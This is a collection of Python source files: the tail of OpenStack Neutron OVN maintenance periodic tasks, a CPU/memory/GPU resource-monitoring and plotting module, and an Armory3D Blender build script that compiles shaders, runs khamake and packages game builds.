addresses.remove(ovn_const.UNKNOWN_ADDR)
if addresses:
self._nb_idl.lsp_set_addresses(
port.name, addresses=addresses).execute(check_error=True)
else:
self._nb_idl.db_clear(
'Logical_Switch_Port', port.name,
'addresses').execute(check_error=True)
raise periodics.NeverAgain()
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600, run_immediately=True)
def check_for_fragmentation_support(self):
if not self.has_lock:
return
context = n_context.get_admin_context()
for net in self._ovn_client._plugin.get_networks(
context, {external_net.EXTERNAL: [True]}):
self._ovn_client.set_gateway_mtu(context, net)
raise periodics.NeverAgain()
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600, run_immediately=True)
def check_for_igmp_snoop_support(self):
if not self.has_lock:
return
with self._nb_idl.transaction(check_error=True) as txn:
value = ('true' if ovn_conf.is_igmp_snooping_enabled()
else 'false')
for ls in self._nb_idl.ls_list().execute(check_error=True):
if ls.other_config.get(ovn_const.MCAST_SNOOP, None) == value:
continue
txn.add(self._nb_idl.db_set(
'Logical_Switch', ls.name,
('other_config', {
ovn_const.MCAST_SNOOP: value,
ovn_const.MCAST_FLOOD_UNREGISTERED: value})))
raise periodics.NeverAgain()
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600, run_immediately=True)
def check_for_ha_chassis_group_address(self):
        # If external ports are not supported, stop running
        # this periodic task
if not self._ovn_client.is_external_ports_supported():
raise periodics.NeverAgain()
if not self.has_lock:
return
default_ch_grp = self._nb_idl.ha_chassis_group_add(
ovn_const.HA_CHASSIS_GROUP_DEFAULT_NAME, may_exist=True).execute(
check_error=True)
# NOTE(lucasagomes): Find the existing chassis with the highest
# priority and keep it as being the highest to avoid moving
# things around
high_prio_ch = max(default_ch_grp.ha_chassis, key=lambda x: x.priority,
default=None)
all_ch = self._sb_idl.get_all_chassis()
gw_ch = self._sb_idl.get_gateway_chassis_from_cms_options()
ch_to_del = set(all_ch) - set(gw_ch)
with self._nb_idl.transaction(check_error=True) as txn:
for ch in ch_to_del:
txn.add(self._nb_idl.ha_chassis_group_del_chassis(
ovn_const.HA_CHASSIS_GROUP_DEFAULT_NAME, ch,
if_exists=True))
            # NOTE(lucasagomes): If the high priority chassis is in
            # the list of chassis to be added/updated, add it first with
            # the highest priority number possible and then add the rest
            # (the priority of the rest of the chassis does not matter
            # since only the highest one is active).
priority = ovn_const.HA_CHASSIS_GROUP_HIGHEST_PRIORITY
if high_prio_ch and high_prio_ch.chassis_name in gw_ch:
txn.add(self._nb_idl.ha_chassis_group_add_chassis(
ovn_const.HA_CHASSIS_GROUP_DEFAULT_NAME,
high_prio_ch.chassis_name, priority=priority))
gw_ch.remove(high_prio_ch.chassis_name)
priority -= 1
for ch in gw_ch:
txn.add(self._nb_idl.ha_chassis_group_add_chassis(
ovn_const.HA_CHASSIS_GROUP_DEFAULT_NAME,
ch, priority=priority))
priority -= 1
raise periodics.NeverAgain()
class HashRingHealthCheckPeriodics(object):
def __init__(self, group):
self._group = group
self.ctx = n_context.get_admin_context()
@periodics.periodic(spacing=ovn_const.HASH_RING_TOUCH_INTERVAL)
def touch_hash_ring_nodes(self):
# NOTE(lucasagomes): Note that we do not rely on the OVSDB lock
# here because we want the maintenance tasks from each instance to
# execute this task.
hash_ring_db.touch_nodes_from_host(self.ctx, self._group)
|
monitor.py
|
""" Monitoring (memory usage, cpu/gpu utilization) tools. """
import os
import time
from math import ceil
from multiprocessing import Process, Manager, Queue
import numpy as np
import matplotlib.pyplot as plt
try:
import psutil
except ImportError:
pass
try:
import nvidia_smi
except ImportError:
# Use this value to raise ImportError later
nvidia_smi = None
class ResourceMonitor:
""" Periodically runs supplied function in a separate process and stores its outputs.
    The created process keeps running until it is told to stop via an internal queue (see `stop`).
Parameters
----------
function : callable
Function to use. If not provided, defaults to the `get_usage` static method.
frequency : number
Periodicity of function calls in seconds.
**kwargs
Passed directly to `function` calls.
Attributes
----------
data : list
Collected function outputs. Preserved between multiple runs.
ticks : list
Times of function calls. Preserved between multiple runs.
"""
def __init__(self, function=None, frequency=0.1, **kwargs):
self.function = function or self.get_usage
self.frequency = frequency
self.kwargs = kwargs
self.pid = os.getpid()
self.running = False
self.stop_queue = None
self.shared_list = None
self.process = None
self.start_time, self.prev_time, self.end_time = None, None, None
self.ticks, self.data = [], []
@staticmethod
def endless_repeat(shared_list, stop_queue, function, frequency, **kwargs):
""" Repeat `function` and storing results, until `stop` signal is recieved. """
while stop_queue.empty():
# As this process is killed ungracefully, it can be shut down in the middle of data appending.
# We let Python handle it by ignoring the exception.
try:
shared_list.append(function(**kwargs))
except (BrokenPipeError, ConnectionResetError):
pass
time.sleep(frequency)
def start(self):
""" Start a separate process with function calls every `frequency` seconds. """
self.running = True
manager = Manager()
self.shared_list = manager.list()
self.stop_queue = Queue()
self.start_time = time.time()
self.prev_time = self.start_time
args = self.shared_list, self.stop_queue, self.function, self.frequency
self.process = Process(target=self.endless_repeat, args=args, kwargs={'pid': self.pid, **self.kwargs})
self.process.start()
def fetch(self):
""" Append collected data to the instance attributes. """
n = len(self.data)
# We copy data so additional points don't appear during this function execution
self.data = self.shared_list[:]
self.end_time = time.time()
# Compute one more entry
point = self.function(pid=self.pid, **self.kwargs)
tick = time.time()
# Update timestamps, append additional entries everywhere
# If data was appended to `shared_list` during the execution of this function, the order might be wrong;
# But, as it would mean that the time between calls to `self.function` is very small, it is negligeable.
self.ticks.extend(np.linspace(self.prev_time, self.end_time, num=len(self.data) - n).tolist())
self.data.append(point)
self.shared_list.append(point)
self.ticks.append(tick)
self.prev_time = time.time()
def stop(self):
""" Stop separate process. """
self.stop_queue.put(True)
self.process.join()
self.running = False
def __enter__(self):
self.start()
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
self.fetch()
self.stop()
def visualize(self):
""" Simple plots of collected data-points. """
plt.figure(figsize=(8, 6))
plt.plot(np.array(self.ticks) - self.ticks[0], self.data)
name = self.__class__.__name__
title = f'{name}\nMEAN: {np.mean(self.data):4.4} STD: {np.std(self.data):4.4}'
plt.title(title)
plt.xlabel('Time, s', fontsize=12)
plt.ylabel(self.UNIT, fontsize=12, rotation='horizontal', labelpad=15)
plt.grid(True)
plt.show()
class CPUMonitor(ResourceMonitor):
""" Track CPU usage. """
UNIT = '%'
@staticmethod
def get_usage(**kwargs):
""" Track CPU usage. """
_ = kwargs
return psutil.cpu_percent()
class MemoryMonitor(ResourceMonitor):
""" Track total virtual memory usage. """
UNIT = 'Gb'
@staticmethod
def get_usage(**kwargs):
""" Track total virtual memory usage. """
_ = kwargs
return psutil.virtual_memory().used / (1024 **3)
class RSSMonitor(ResourceMonitor):
""" Track non-swapped physical memory usage. """
UNIT = 'Gb'
@staticmethod
def get_usage(pid=None, **kwargs):
""" Track non-swapped physical memory usage. """
_ = kwargs
process = psutil.Process(pid)
        return process.memory_info().rss / (1024 ** 3)  # gbytes, to match UNIT
class VMSMonitor(ResourceMonitor):
""" Track current process virtual memory usage. """
UNIT = 'Gb'
@staticmethod
def get_usage(pid=None, **kwargs):
""" Track current process virtual memory usage. """
_ = kwargs
process = psutil.Process(pid)
return process.memory_info().vms / (1024 ** 3) # gbytes
class USSMonitor(ResourceMonitor):
""" Track current process unique virtual memory usage. """
UNIT = 'Gb'
@staticmethod
def get_usage(pid=None, **kwargs):
""" Track current process unique virtual memory usage. """
_ = kwargs
process = psutil.Process(pid)
return process.memory_full_info().uss / (1024 ** 3) # gbytes
class GPUMonitor(ResourceMonitor):
""" Track GPU usage. """
UNIT = '%'
def __init__(self, *args, **kwargs):
if nvidia_smi is None:
raise ImportError('Install Python interface for nvidia_smi')
super().__init__(*args, **kwargs)
@staticmethod
def get_usage(gpu_list=None, **kwargs):
""" Track GPU usage. """
_ = kwargs
gpu_list = gpu_list or [0]
nvidia_smi.nvmlInit()
handle = [nvidia_smi.nvmlDeviceGetHandleByIndex(i) for i in gpu_list]
        res = [nvidia_smi.nvmlDeviceGetUtilizationRates(item) for item in handle]
        nvidia_smi.nvmlShutdown()
        return [item.gpu for item in res]
class GPUMemoryUtilizationMonitor(ResourceMonitor):
""" Track GPU memory utilization. """
UNIT = '%'
def __init__(self, *args, **kwargs):
if nvidia_smi is None:
raise ImportError('Install Python interface for nvidia_smi')
super().__init__(*args, **kwargs)
@staticmethod
def get_usage(gpu_list=None, **kwargs):
""" Track GPU memory utilization. """
_ = kwargs
gpu_list = gpu_list or [0]
nvidia_smi.nvmlInit()
handle = [nvidia_smi.nvmlDeviceGetHandleByIndex(i) for i in gpu_list]
        res = [nvidia_smi.nvmlDeviceGetUtilizationRates(item) for item in handle]
        nvidia_smi.nvmlShutdown()
        return [item.memory for item in res]
class GPUMemoryMonitor(ResourceMonitor):
""" Track GPU memory usage. """
UNIT = '%'
def __init__(self, *args, **kwargs):
if nvidia_smi is None:
raise ImportError('Install Python interface for nvidia_smi')
super().__init__(*args, **kwargs)
@staticmethod
def get_usage(gpu_list=None, **kwargs):
""" Track GPU memory usage. """
_ = kwargs
gpu_list = gpu_list or [0]
nvidia_smi.nvmlInit()
handle = [nvidia_smi.nvmlDeviceGetHandleByIndex(i) for i in gpu_list]
res = [nvidia_smi.nvmlDeviceGetMemoryInfo(item) for item in handle]
res = [100 * item.used / item.total for item in res]
nvidia_smi.nvmlShutdown()
return res
MONITOR_ALIASES = {
MemoryMonitor: ['mmonitor', 'memory', 'memorymonitor'],
CPUMonitor: ['cmonitor', 'cpu', 'cpumonitor'],
RSSMonitor: ['rss'],
VMSMonitor: ['vms'],
USSMonitor: ['uss'],
GPUMonitor: ['gpu'],
GPUMemoryMonitor: ['gpu_memory'],
GPUMemoryUtilizationMonitor: ['gpu_memory_utilization']
}
MONITOR_ALIASES = {alias: monitor for monitor, aliases in MONITOR_ALIASES.items()
for alias in aliases}
class Monitor(list):
""" Holder for multiple monitors with simple visualization method. """
def __init__(self, monitors=('cpu', 'memory', 'gpu'), frequency=0.1, **kwargs):
monitors = [monitors] if not isinstance(monitors, (tuple, list)) else monitors
monitors = [MONITOR_ALIASES[monitor.lower()](frequency=frequency, **kwargs)
if isinstance(monitor, str) else monitor
for monitor in monitors]
super().__init__(monitors)
def __enter__(self):
for monitor in self:
monitor.start()
        return self[0] if len(self) == 1 else self
def __exit__(self, exc_type, exc_value, exc_traceback):
for monitor in self:
monitor.fetch()
monitor.stop()
def visualize(self, layout=None, figsize=None, suptitle='', savepath=None, show=True):
""" Visualize multiple monitors in a single figure.
Parameters
----------
layout : tuple of ints
Grid layout of plots.
figsize : tuple of numbers
Size of figure: width and height.
suptitle : str
Title for the figure.
"""
if layout is None:
layout = ceil(len(self) / 3), 3 if len(self) > 2 else len(self)
figsize = figsize or (7 * layout[1], 8 * layout[0])
fig, ax = plt.subplots(*layout, figsize=figsize)
ax = np.atleast_2d(ax)
for i, monitor in enumerate(self):
name = monitor.__class__.__name__
title = f'{name}\nMEAN: {np.mean(monitor.data):4.4} STD: {np.std(monitor.data):4.4}'
ax[i // layout[1], i % layout[1]].plot(np.array(monitor.ticks) - monitor.ticks[0], monitor.data)
ax[i // layout[1], i % layout[1]].set_title(title, fontsize=16)
ax[i // layout[1], i % layout[1]].set_xlabel('Time, s', fontsize=14)
ax[i // layout[1], i % layout[1]].set_ylabel(monitor.UNIT, fontsize=12, rotation='horizontal', labelpad=15)
ax[i // layout[1], i % layout[1]].grid(True)
for i in range(len(self), layout[0] * layout[1]):
ax[i // layout[1], i % layout[1]].set_axis_off()
if suptitle:
fig.suptitle(suptitle, fontsize=24)
if savepath:
plt.savefig(savepath, bbox_inches='tight', pad_inches=0)
if show:
plt.show()
else:
plt.close()
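# Minimal usage sketch (not part of the module): track CPU and system memory
# around a toy workload and plot the collected series. Assumes `psutil` and a
# matplotlib display backend are available.
if __name__ == "__main__":
    with Monitor(monitors=('cpu', 'memory'), frequency=0.05) as monitor:
        _ = [i ** 0.5 for i in range(10 ** 6)]  # toy workload to observe
    monitor.visualize(suptitle='Toy workload')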
|
make.py
|
import glob
import json
import os
import shutil
import time
import stat
import subprocess
import threading
import webbrowser
import shlex
import bpy
import arm.assets as assets
from arm.exporter import ArmoryExporter
import arm.lib.make_datas
import arm.lib.server
import arm.log as log
import arm.make_logic as make_logic
import arm.make_renderpath as make_renderpath
import arm.make_state as state
import arm.make_world as make_world
import arm.utils
import arm.write_data as write_data
scripts_mtime = 0 # Monitor source changes
profile_time = 0
def run_proc(cmd, done):
def fn(p, done):
p.wait()
        if done is not None:
done()
p = subprocess.Popen(cmd)
threading.Thread(target=fn, args=(p, done)).start()
return p
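# Illustrative usage sketch (command and callback are hypothetical):
#
#     proc = run_proc(['node', '--version'], done=lambda: print('node finished'))
#     proc.wait()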
def compile_shader_pass(res, raw_shaders_path, shader_name, defs, make_variants):
os.chdir(raw_shaders_path + '/' + shader_name)
# Open json file
json_name = shader_name + '.json'
with open(json_name) as f:
json_file = f.read()
json_data = json.loads(json_file)
fp = arm.utils.get_fp_build()
arm.lib.make_datas.make(res, shader_name, json_data, fp, defs, make_variants)
path = fp + '/compiled/Shaders'
c = json_data['contexts'][0]
for s in ['vertex_shader', 'fragment_shader', 'geometry_shader', 'tesscontrol_shader', 'tesseval_shader']:
if s in c:
shutil.copy(c[s], path + '/' + c[s].split('/')[-1])
def remove_readonly(func, path, excinfo):
os.chmod(path, stat.S_IWRITE)
func(path)
def export_data(fp, sdk_path):
wrd = bpy.data.worlds['Arm']
print('\n' + '_' * 10 + ' [Armory] Compiling ' + '_' * 10)
if wrd.arm_verbose_output:
print('\nArmory v{0} ({1})'.format(wrd.arm_version, wrd.arm_commit))
print('OS: ' + arm.utils.get_os() + ', Target: ' + state.target + ', GAPI: ' + arm.utils.get_gapi() + ', Blender: ' + bpy.app.version_string)
# Clean compiled variants if cache is disabled
build_dir = arm.utils.get_fp_build()
if not wrd.arm_cache_build:
if os.path.isdir(build_dir + '/debug/html5-resources'):
shutil.rmtree(build_dir + '/debug/html5-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/krom-resources'):
shutil.rmtree(build_dir + '/krom-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/debug/krom-resources'):
shutil.rmtree(build_dir + '/debug/krom-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/windows-resources'):
shutil.rmtree(build_dir + '/windows-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/linux-resources'):
shutil.rmtree(build_dir + '/linux-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/osx-resources'):
shutil.rmtree(build_dir + '/osx-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/compiled/Shaders'):
shutil.rmtree(build_dir + '/compiled/Shaders', onerror=remove_readonly)
raw_shaders_path = sdk_path + '/armory/Shaders/'
assets_path = sdk_path + '/armory/Assets/'
export_physics = bpy.data.worlds['Arm'].arm_physics != 'Disabled'
export_navigation = bpy.data.worlds['Arm'].arm_navigation != 'Disabled'
export_ui = bpy.data.worlds['Arm'].arm_ui != 'Disabled'
assets.reset()
# Build node trees
ArmoryExporter.import_traits = []
make_logic.build()
make_world.build()
make_renderpath.build()
# Export scene data
assets.embedded_data = sorted(list(set(assets.embedded_data)))
physics_found = False
navigation_found = False
ui_found = False
ArmoryExporter.compress_enabled = state.is_publish and wrd.arm_asset_compression
ArmoryExporter.optimize_enabled = state.is_publish and wrd.arm_optimize_data
if not os.path.exists(build_dir + '/compiled/Assets'):
os.makedirs(build_dir + '/compiled/Assets')
# have a "zoo" collection in the current scene
export_coll = bpy.data.collections.new("export_coll")
bpy.context.scene.collection.children.link(export_coll)
for scene in bpy.data.scenes:
if scene == bpy.context.scene: continue
for o in scene.collection.all_objects:
if o.type == "MESH" or o.type == "EMPTY":
if o.name not in export_coll.all_objects.keys():
export_coll.objects.link(o)
depsgraph = bpy.context.evaluated_depsgraph_get()
bpy.data.collections.remove(export_coll) # destroy "zoo" collection
for scene in bpy.data.scenes:
if scene.arm_export:
ext = '.lz4' if ArmoryExporter.compress_enabled else '.arm'
asset_path = build_dir + '/compiled/Assets/' + arm.utils.safestr(scene.name) + ext
ArmoryExporter.export_scene(bpy.context, asset_path, scene=scene, depsgraph=depsgraph)
if ArmoryExporter.export_physics:
physics_found = True
if ArmoryExporter.export_navigation:
navigation_found = True
if ArmoryExporter.export_ui:
ui_found = True
assets.add(asset_path)
    if not physics_found:  # Disable physics if no rigid body is exported
        export_physics = False
    if not navigation_found:
        export_navigation = False
    if not ui_found:
        export_ui = False
if wrd.arm_ui == 'Enabled':
export_ui = True
modules = []
if wrd.arm_audio == 'Enabled':
modules.append('audio')
if export_physics:
modules.append('physics')
if export_navigation:
modules.append('navigation')
if export_ui:
modules.append('ui')
defs = arm.utils.def_strings_to_array(wrd.world_defs)
cdefs = arm.utils.def_strings_to_array(wrd.compo_defs)
if wrd.arm_verbose_output:
print('Exported modules:', modules)
print('Shader flags:', defs)
print('Compositor flags:', cdefs)
print('Khafile flags:', assets.khafile_defs)
# Render path is configurable at runtime
has_config = wrd.arm_write_config or os.path.exists(arm.utils.get_fp() + '/Bundled/config.arm')
# Write compiled.inc
shaders_path = build_dir + '/compiled/Shaders'
if not os.path.exists(shaders_path):
os.makedirs(shaders_path)
write_data.write_compiledglsl(defs + cdefs, make_variants=has_config)
# Write referenced shader passes
if not os.path.isfile(build_dir + '/compiled/Shaders/shader_datas.arm') or state.last_world_defs != wrd.world_defs:
res = {'shader_datas': []}
for ref in assets.shader_passes:
# Ensure shader pass source exists
if not os.path.exists(raw_shaders_path + '/' + ref):
continue
assets.shader_passes_assets[ref] = []
if ref.startswith('compositor_pass'):
compile_shader_pass(res, raw_shaders_path, ref, defs + cdefs, make_variants=has_config)
else:
compile_shader_pass(res, raw_shaders_path, ref, defs, make_variants=has_config)
# Workaround to also export non-material world shaders
res['shader_datas'] += make_world.shader_datas
arm.utils.write_arm(shaders_path + '/shader_datas.arm', res)
for ref in assets.shader_passes:
for s in assets.shader_passes_assets[ref]:
assets.add_shader(shaders_path + '/' + s + '.glsl')
for file in assets.shaders_external:
name = file.split('/')[-1].split('\\')[-1]
target = build_dir + '/compiled/Shaders/' + name
if not os.path.exists(target):
shutil.copy(file, target)
state.last_world_defs = wrd.world_defs
# Reset path
os.chdir(fp)
# Copy std shaders
if not os.path.isdir(build_dir + '/compiled/Shaders/std'):
shutil.copytree(raw_shaders_path + 'std', build_dir + '/compiled/Shaders/std')
# Write config.arm
resx, resy = arm.utils.get_render_resolution(arm.utils.get_active_scene())
if wrd.arm_write_config:
write_data.write_config(resx, resy)
# Write khafile.js
enable_dce = state.is_publish and wrd.arm_dce
import_logic = not state.is_publish and arm.utils.logic_editor_space() != None
write_data.write_khafilejs(state.is_play, export_physics, export_navigation, export_ui, state.is_publish, enable_dce, ArmoryExporter.import_traits, import_logic)
# Write Main.hx - depends on write_khafilejs for writing number of assets
scene_name = arm.utils.get_project_scene_name()
write_data.write_mainhx(scene_name, resx, resy, state.is_play, state.is_publish)
if scene_name != state.last_scene or resx != state.last_resx or resy != state.last_resy:
wrd.arm_recompile = True
state.last_resx = resx
state.last_resy = resy
state.last_scene = scene_name
def compile(assets_only=False):
wrd = bpy.data.worlds['Arm']
fp = arm.utils.get_fp()
os.chdir(fp)
# Set build command
target_name = state.target
node_path = arm.utils.get_node_path()
khamake_path = arm.utils.get_khamake_path()
cmd = [node_path, khamake_path]
kha_target_name = arm.utils.get_kha_target(target_name)
if kha_target_name != '':
cmd.append(kha_target_name)
# Custom exporter
if state.is_export:
item = wrd.arm_exporterlist[wrd.arm_exporterlist_index]
if item.arm_project_target == 'custom' and item.arm_project_khamake != '':
for s in item.arm_project_khamake.split(' '):
cmd.append(s)
ffmpeg_path = arm.utils.get_ffmpeg_path() # Path to binary
if ffmpeg_path != '':
cmd.append('--ffmpeg')
cmd.append(ffmpeg_path) # '"' + ffmpeg_path + '"'
state.export_gapi = arm.utils.get_gapi()
cmd.append('-g')
cmd.append(state.export_gapi)
if arm.utils.get_legacy_shaders() or 'ios' in state.target:
if 'html5' in state.target or 'ios' in state.target:
pass
else:
cmd.append('--shaderversion')
cmd.append('110')
elif 'android' in state.target or 'html5' in state.target:
cmd.append('--shaderversion')
cmd.append('300')
else:
cmd.append('--shaderversion')
cmd.append('330')
if '_VR' in wrd.world_defs:
cmd.append('--vr')
cmd.append('webvr')
if arm.utils.get_rp().rp_renderer == 'Raytracer':
cmd.append('--raytrace')
cmd.append('dxr')
dxc_path = fp + '/HlslShaders/dxc.exe'
subprocess.Popen([dxc_path, '-Zpr', '-Fo', fp + '/Bundled/raytrace.cso', '-T', 'lib_6_3', fp + '/HlslShaders/raytrace.hlsl']).wait()
if arm.utils.get_khamake_threads() > 1:
cmd.append('--parallelAssetConversion')
cmd.append(str(arm.utils.get_khamake_threads()))
compilation_server = False
cmd.append('--to')
if (kha_target_name == 'krom' and not state.is_publish) or (kha_target_name == 'html5' and not state.is_publish):
cmd.append(arm.utils.build_dir() + '/debug')
# Start compilation server
if kha_target_name == 'krom' and arm.utils.get_compilation_server() and not assets_only and wrd.arm_cache_build:
compilation_server = True
arm.lib.server.run_haxe(arm.utils.get_haxe_path())
else:
cmd.append(arm.utils.build_dir())
if not wrd.arm_verbose_output:
cmd.append("--quiet")
else:
print("Using project from " + arm.utils.get_fp())
print("Running: ", cmd)
# Project needs to be compiled at least once
# before compilation server can work
if not os.path.exists(arm.utils.build_dir() + '/debug/krom/krom.js') and not state.is_publish:
state.proc_build = run_proc(cmd, build_done)
else:
if assets_only or compilation_server:
cmd.append('--nohaxe')
cmd.append('--noproject')
state.proc_build = run_proc(cmd, assets_done if compilation_server else build_done)
def build(target, is_play=False, is_publish=False, is_export=False):
global profile_time
profile_time = time.time()
state.target = target
state.is_play = is_play
state.is_publish = is_publish
state.is_export = is_export
# Save blend
if arm.utils.get_save_on_build():
bpy.ops.wm.save_mainfile()
log.clear(clear_warnings=True)
# Set camera in active scene
active_scene = arm.utils.get_active_scene()
if active_scene.camera == None:
for o in active_scene.objects:
if o.type == 'CAMERA':
active_scene.camera = o
break
# Get paths
sdk_path = arm.utils.get_sdk_path()
raw_shaders_path = sdk_path + '/armory/Shaders/'
# Set dir
fp = arm.utils.get_fp()
os.chdir(fp)
# Create directories
wrd = bpy.data.worlds['Arm']
sources_path = 'Sources/' + arm.utils.safestr(wrd.arm_project_package)
if not os.path.exists(sources_path):
os.makedirs(sources_path)
# Save external scripts edited inside Blender
write_texts = False
for text in bpy.data.texts:
if text.filepath != '' and text.is_dirty:
write_texts = True
break
if write_texts:
area = bpy.context.area
old_type = area.type
area.type = 'TEXT_EDITOR'
for text in bpy.data.texts:
if text.filepath != '' and text.is_dirty and os.path.isfile(text.filepath):
area.spaces[0].text = text
bpy.ops.text.save()
area.type = old_type
# Save internal Haxe scripts
for text in bpy.data.texts:
if text.filepath == '' and text.name[-3:] == '.hx':
with open('Sources/' + arm.utils.safestr(wrd.arm_project_package) + '/' + text.name, 'w') as f:
f.write(text.as_string())
# Export data
export_data(fp, sdk_path)
if state.target == 'html5':
w, h = arm.utils.get_render_resolution(arm.utils.get_active_scene())
write_data.write_indexhtml(w, h, is_publish)
# Bundle files from include dir
if os.path.isdir('include'):
dest = '/html5/' if is_publish else '/debug/html5/'
for fn in glob.iglob(os.path.join('include', '**'), recursive=False):
shutil.copy(fn, arm.utils.build_dir() + dest + os.path.basename(fn))
def play_done():
state.proc_play = None
state.redraw_ui = True
log.clear()
def assets_done():
if state.proc_build == None:
return
result = state.proc_build.poll()
if result == 0:
# Connect to the compilation server
os.chdir(arm.utils.build_dir() + '/debug/')
cmd = [arm.utils.get_haxe_path(), '--connect', '6000', 'project-krom.hxml']
state.proc_build = run_proc(cmd, compilation_server_done)
else:
state.proc_build = None
state.redraw_ui = True
log.error('Build failed, check console')
def compilation_server_done():
if state.proc_build == None:
return
result = state.proc_build.poll()
if result == 0:
build_done()
else:
state.proc_build = None
state.redraw_ui = True
log.error('Build failed, check console')
def build_done():
print('Finished in ' + str(time.time() - profile_time))
if log.num_warnings > 0:
log.print_warn(f'{log.num_warnings} warnings occurred during compilation')
if state.proc_build is None:
return
result = state.proc_build.poll()
state.proc_build = None
state.redraw_ui = True
if result == 0:
bpy.data.worlds['Arm'].arm_recompile = False
build_success()
else:
log.error('Build failed, check console')
def patch():
if state.proc_build != None:
return
assets.invalidate_enabled = False
fp = arm.utils.get_fp()
os.chdir(fp)
asset_path = arm.utils.get_fp_build() + '/compiled/Assets/' + arm.utils.safestr(bpy.context.scene.name) + '.arm'
ArmoryExporter.export_scene(bpy.context, asset_path, scene=bpy.context.scene)
if not os.path.isdir(arm.utils.build_dir() + '/compiled/Shaders/std'):
raw_shaders_path = arm.utils.get_sdk_path() + '/armory/Shaders/'
shutil.copytree(raw_shaders_path + 'std', arm.utils.build_dir() + '/compiled/Shaders/std')
node_path = arm.utils.get_node_path()
khamake_path = arm.utils.get_khamake_path()
cmd = [node_path, khamake_path, 'krom']
cmd.extend(('--shaderversion', '330', '--parallelAssetConversion', '4',
'--to', arm.utils.build_dir() + '/debug', '--nohaxe', '--noproject'))
assets.invalidate_enabled = True
state.proc_build = run_proc(cmd, patch_done)
def patch_done():
js = 'iron.Scene.patch();'
write_patch(js)
state.proc_build = None
patch_id = 0
def write_patch(js):
global patch_id
with open(arm.utils.get_fp_build() + '/debug/krom/krom.patch', 'w') as f:
patch_id += 1
f.write(str(patch_id) + '\n')
f.write(js)
def runtime_to_target():
wrd = bpy.data.worlds['Arm']
if wrd.arm_runtime == 'Krom':
return 'krom'
else:
return 'html5'
def get_khajs_path(target):
if target == 'krom':
return arm.utils.build_dir() + '/debug/krom/krom.js'
else: # Browser
return arm.utils.build_dir() + '/debug/html5/kha.js'
def play():
global scripts_mtime
wrd = bpy.data.worlds['Arm']
build(target=runtime_to_target(), is_play=True)
khajs_path = get_khajs_path(state.target)
if not wrd.arm_cache_build or \
not os.path.isfile(khajs_path) or \
assets.khafile_defs_last != assets.khafile_defs or \
state.last_target != state.target:
wrd.arm_recompile = True
state.last_target = state.target
# Trait sources modified
state.mod_scripts = []
script_path = arm.utils.get_fp() + '/Sources/' + arm.utils.safestr(wrd.arm_project_package)
if os.path.isdir(script_path):
new_mtime = scripts_mtime
for fn in glob.iglob(os.path.join(script_path, '**', '*.hx'), recursive=True):
mtime = os.path.getmtime(fn)
if scripts_mtime < mtime:
arm.utils.fetch_script_props(fn) # Trait props
fn = fn.split('Sources/')[1]
fn = fn[:-3] #.hx
fn = fn.replace('/', '.')
state.mod_scripts.append(fn)
wrd.arm_recompile = True
if new_mtime < mtime:
new_mtime = mtime
scripts_mtime = new_mtime
if len(state.mod_scripts) > 0: # Trait props
arm.utils.fetch_trait_props()
compile(assets_only=(not wrd.arm_recompile))
def build_success():
log.clear()
wrd = bpy.data.worlds['Arm']
if state.is_play:
if wrd.arm_runtime == 'Browser':
# Start server
os.chdir(arm.utils.get_fp())
t = threading.Thread(name='localserver', target=arm.lib.server.run_tcp)
t.daemon = True
t.start()
html5_app_path = 'http://localhost:8040/' + arm.utils.build_dir() + '/debug/html5'
webbrowser.open(html5_app_path)
elif wrd.arm_runtime == 'Krom':
if wrd.arm_live_patch:
open(arm.utils.get_fp_build() + '/debug/krom/krom.patch', 'w').close()
krom_location, krom_path = arm.utils.krom_paths()
os.chdir(krom_location)
cmd = [krom_path, arm.utils.get_fp_build() + '/debug/krom', arm.utils.get_fp_build() + '/debug/krom-resources']
if arm.utils.get_os() == 'win':
cmd.append('--consolepid')
cmd.append(str(os.getpid()))
if wrd.arm_audio == 'Disabled':
cmd.append('--nosound')
state.proc_play = run_proc(cmd, play_done)
elif state.is_publish:
sdk_path = arm.utils.get_sdk_path()
target_name = arm.utils.get_kha_target(state.target)
files_path = os.path.join(arm.utils.get_fp_build(), target_name)
if (target_name == 'html5' or target_name == 'krom') and wrd.arm_minify_js:
# Minify JS
minifier_path = sdk_path + '/lib/armory_tools/uglifyjs/bin/uglifyjs'
if target_name == 'html5':
jsfile = files_path + '/kha.js'
else:
jsfile = files_path + '/krom.js'
args = [arm.utils.get_node_path(), minifier_path, jsfile, '-o', jsfile]
proc = subprocess.Popen(args)
proc.wait()
if target_name == 'krom':
# Copy Krom binaries
if state.target == 'krom-windows':
gapi = state.export_gapi
ext = '' if gapi == 'direct3d11' else '_' + gapi
krom_location = sdk_path + '/Krom/Krom' + ext + '.exe'
shutil.copy(krom_location, files_path + '/Krom.exe')
krom_exe = arm.utils.safestr(wrd.arm_project_name) + '.exe'
os.rename(files_path + '/Krom.exe', files_path + '/' + krom_exe)
elif state.target == 'krom-linux':
krom_location = sdk_path + '/Krom/Krom'
shutil.copy(krom_location, files_path)
krom_exe = arm.utils.safestr(wrd.arm_project_name)
os.rename(files_path + '/Krom', files_path + '/' + krom_exe)
krom_exe = './' + krom_exe
else:
krom_location = sdk_path + '/Krom/Krom.app'
shutil.copytree(krom_location, files_path + '/Krom.app')
game_files = os.listdir(files_path)
for f in game_files:
f = files_path + '/' + f
if os.path.isfile(f):
shutil.move(f, files_path + '/Krom.app/Contents/MacOS')
krom_exe = arm.utils.safestr(wrd.arm_project_name) + '.app'
os.rename(files_path + '/Krom.app', files_path + '/' + krom_exe)
# Rename
ext = state.target.split('-')[-1] # krom-windows
new_files_path = files_path + '-' + ext
os.rename(files_path, new_files_path)
files_path = new_files_path
if target_name == 'html5':
project_path = files_path
print('Exported HTML5 package to ' + project_path)
elif target_name.startswith('ios') or target_name.startswith('osx'): # TODO: to macos
project_path = files_path + '-build'
print('Exported XCode project to ' + project_path)
elif target_name.startswith('windows'):
project_path = files_path + '-build'
print('Exported Visual Studio 2017 project to ' + project_path)
